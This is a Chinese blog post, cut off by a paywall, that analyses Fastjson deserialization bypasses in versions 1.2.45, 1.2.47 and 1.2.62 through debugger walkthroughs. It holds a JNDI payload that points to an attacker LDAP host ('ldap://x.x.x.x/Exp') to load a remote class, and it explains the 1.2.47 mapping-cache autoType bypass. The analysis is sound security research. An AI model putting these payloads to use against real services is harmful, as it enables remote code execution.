Fastjson各版本漏洞分析(下)

最新推荐文章于 2025-06-12 19:16:19 发布
原创 最新推荐文章于 2025-06-12 19:16:19 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #jvm #安全

fastjson 1.2.45

1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的

运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String,
java.lang.Class<?>, int)成功拦截

分析一下,发现如果开头是[就直接抛出异常

1649991071_6258dd9fa1c09e2046d39.png!small?1649991072045

那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话也抛出异常

1649991086_6258ddae200f8b7f23fc9.png!small?1649991086510

当然这个版本既然有RCE,肯定不是之前的方法绕过的,这次是通过不在黑名单里面的类来绕过的

{“@type”:“org.apache.ibatis.datasource.jndi.JndiDataSourceFactory”,“properties”:{“data_source”:“ldap://x.x.x.x/Exp”}}

** fastjson 1.2.47**

这个版本绕过了autoTypeSupport检测, ** 不开启** ** ast** ** 依然可以利用** (1.2.25 -
1.2.45 这些绕过都是需要开启ast的)

Payload:

{
"a":
{
"@type": "java.lang.Class",
"val": "org.example.User"
},
"b":
{
"@type": "org.example.User",
"username": "123456",
"age": 123
}
}

1649991103_6258ddbf310ca2a1eea5a.png!small?1649991103544

绕过原理:

利用到了java.lang.class,这个类不在黑名单,所以checkAutotype可以过

这个java.lang.class类对应的deserializer为MiscCodec,deserialize时会取json串中的val值并load这个val对应的class,如果fastjson
cache为true,就会缓存这个val对应的class到全局map中

如果再次加载val名称的class,并且autotype没开启(因为开启了会先检测黑白名单,所以这个漏洞开启了反而不成功),下一步就是会尝试从全局map中获取这个class,如果获取到了,直接返回

debug分析:

在setXXX的地方下断点,运行看下调用堆栈信息

setUsername:28, User (org.example)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
setValue:110, FieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:124, DefaultFieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:1078, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:773, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:271, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
parseObject:384, DefaultJSONParser (com.alibaba.fastjson.parser)
parseObject:544, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1322, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:152, JSON (com.alibaba.fastjson)
parse:162, JSON (com.alibaba.fastjson)
parse:131, JSON (com.alibaba.fastjson)
parseObject:223, JSON (com.alibaba.fastjson)
main:20, App (org.example)

进入到parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)开始下断点重新运行分析

1649991120_6258ddd0619687f0d0d4e.png!small?1649991120710

跟进,一直F8,识别到传入的参数a,继续向下,识别到后面还是{开头后,递归调用parseObject

1649991133_6258ddddea4c36d23986a.png!small?1649991134281

继续往后识别到@type

1649991141_6258dde51183640081a1a.png!small?1649991141622

然后就是进入checkAutoType检查,因为java.lang.Class在this.deserializers.buckets里面,所以直接返回了class
java.lang.Class

1649991147_6258ddeb9c95a5c01bc4e.png!small?1649991148262

通过了checkAutoType检查后,常规调用deserializer.deserialze进行反序列化,但这里是com.alibaba.fastjson.serializer.MiscCodec#deserialze

1649991153_6258ddf192c0b4b52a1bb.png!small?1649991153913

这里会取出我们的变量val的值,也是我们传入的恶意类

1649991167_6258ddff959b363e9597f.png!small?1649991168307

然后就是一系列的Class的判断,一直到Class.class,然后会进入loadClass

1649991174_6258de0673bfa5af3b060.png!small?1649991175082

跟进loadClass,一直跟,发现在cache为true的时候,会直接给咱们的恶意类加入到mappings中,而这个mappings是不是看着很眼熟?后面分析

1649991185_6258de111b48ef95a8e17.png!small?1649991185666

这个cache默认就是为true

1649991196_6258de1c3e49144832bb5.png!small?1649991196571

然后开始处理字段b,和上面类似,我们一直到checkAutoType

可以看到此处如果开启了autoTypeSupport检查会进入黑名单检查,反而影响我们的payload

1649991206_6258de26b91ed309c5ad0.png!small?1649991207308

跟进下方的getClassFromMapping,可以看到就是上面我们添加恶意类的那个Mapping,从此绕过了checkAutoType检查

1649991213_6258de2dc38b1d3ac8caa.png!small?1649991214659

到此差不多就结束了,大佬就是大佬,太牛了

** fastjson 1.2.62**

1.2.47后肯定修复了,怎么修的呢?我们用1.2.62去试试1.2.47的POC

1649991223_6258de374e8e6e54c1601.png!small?1649991223839

抛出了一场,然后下个异常断点,分析一下,看样子是前面某个地方设置了autoTypeSupport的值

1649991230_6258de3e0ef46bf9acecb.png!small?1649991230476

咱们追踪一下这个变量,下个字段断点

1649991244_6258de4c9ca7bc1675951.png!small?1649991245445

发现来源是这

1649991252_6258de54c1baaf37fd9cb.png!small?1649991253417

跟一下AUTO_SUPPORT,原来是从配置文件里面读是否开启了autoTypeSupport。。。大意了

最低0.47元/天 解锁文章

200万优质内容无限畅学
隔壁王哥-
关注
漏洞分析Fastjson最新版本RCE漏洞
anquan2233的博客
11-13 1640
顺着这个思路,我们继续在ObjectDeserializer接口的其他子类中寻找expectClass非空的checkAutoType调用,发现在子类ThrowableDeserializer的函数deserialze中也存在满足条件的调用。而Gson不是这么做的,它是通过反射遍历该类中的所有属性,并把其值序列化为Json。从以上现象中我们得知,当一个类中包含了一个接口(或抽象类)的时候,使用Fastjson进行序列化,会将子类型抹去,只保留接口(抽象类)的类型,使得反序列化时无法拿到原始类型。
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 4368
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
FastJSON 1.2.83版本升级指南:安全加固与性能优化实践
最新发布
qq_22313643的博客
06-12 1222
FastJSON 1.2.83版本升级指南摘要:本文介绍了FastJSON 1.2.83版本的升级实践,重点包含安全加固和性能优化两方面。升级背景分析了早期版本安全风险,包括@type反序列化漏洞和AutoType机制风险。实施方案涵盖依赖更新、配置文件优化和SpringBoot集成配置,强调启用安全模式和禁用AutoType支持。安全实践部分提供了输入验证和网关层防护的代码示例。性能优化包括解析器配置和序列化调优策略。最后给出升级验证测试方法、常见问题解决方案以及监控运维建议,强调安全优先、渐进升级和全
Fastjson漏洞
qq_50854662的博客
10-09 6155
Fastjson漏洞
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2812
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
亲手带你 Debug Fastjson安全漏洞
代码界的扛把子
04-28 2346
简介 Java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjsonfastjson是阿里巴巴一个开源的json相关的java library,地址在这里, https://github.com/alibaba/fastjsonFastjson可以将java的对象转换成json的形式,也可以用来将json转换成java对象,效率较高,被广泛的用在web服务以及android上,它的JSONString()方法可以将java的对象转换成j
【亲测免费】 探索快速且精准的Fastjson漏洞检测工具:FastjsonScan
gitblog_00045的博客
05-16 1498
探索快速且精准的Fastjson漏洞检测工具:FastjsonScan 在今天这个高度数字化的时代,数据的安全性至关重要。作为Java世界中广泛使用的JSON解析库,Fastjson因其高效性能深受开发者喜爱。然而,随之而来的是频繁出现的安全隐患。为此,我们向您推荐一款强大且持续更新的漏洞探测工具——FastjsonScan,旨在帮助您及时发现并解决Fastjson的反序列化漏洞。 项目介绍 Fa...
代码审计-Fastjson版本漏洞分析(上)
cdyunaq的博客
04-15 3483
- 前言 - 最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了 •在1.2.25之后的版本,以及所有的.sec01后缀版本中,autotype功能默认是受限的(黑白名单机制) •在1.2.68之后的版本fastjson增加了safeMode的支持。配置safeMode后,无论白名单和黑名单,都不支持autoType - 概念 - 可能出现一些新的概念,给一些参考链接吧 •FastJSON为什么要有autoType功能 •enable_auto
渗透测试-Fastjson版本漏洞分析(下)
cdyunaq的博客
04-18 4283
- fastjson 1.2.45 - 1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的 运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class, int)成功拦截 分析一下,发现如果开头是[就直接抛出异常 那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话
Fastjson漏洞分析与复现
未完成的歌~的博客
08-26 1796
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
fastjson 各个 版本 jar
03-25
fastjson-1.1.35.jar ,fastjson-1.1.36.jar ,fastjson-1.1.37.jar ,fastjson-1.1.44.jar ,fastjson-1.2.3.jar,fastjson-1.2.4.jar
各个版本fastJson_jar包最新版
10-17
各个版本fastJson_jar包最新版,方便各位学习,交流互用
fastjson最新版本库1.2.47
12-25
fastjon最新版本库1.2.47,分享资源,一起学习。
Fastjson漏洞原理分析
LTianHang的博客
06-04 5658
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
告急!fastjson又被发现漏洞,这次危害可导致服务瘫痪!
Java后端技术
09-08 389
点击上方“Java后端技术”,选择“置顶或者星标”你关注的就是我关心的!本文来源:https://tinyurl.com/y53yanrw上一篇:不敢相信?System....
fastjson漏洞批量检测工具
weixin_46211944的博客
09-07 687
将工具的流量代理到burpsuite中(此工具不能适应所有的情况,可通过该方式对payload进行适当调整)将请求中需要检测的位置替换为$payload$,其余位置不变,保存为req.txt(文件名任意)格式: {.........$type$://$ip$/路径....}#注释内容​​​​​​​。此时LDAP服务器可收到路径信息,可根据路径信息来定位触发漏洞的payload。若使用-req参数进行检测时,需要设置需要检测的变量值位置。格式:​​​​​​​。注意:​​​​​​​。注意:​​​​​​​。
Fastjson漏洞之CVE-2022-25845
GalaxySpaceX的博客
06-17 2774
Fastjson漏洞之CVE-2022-25845
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值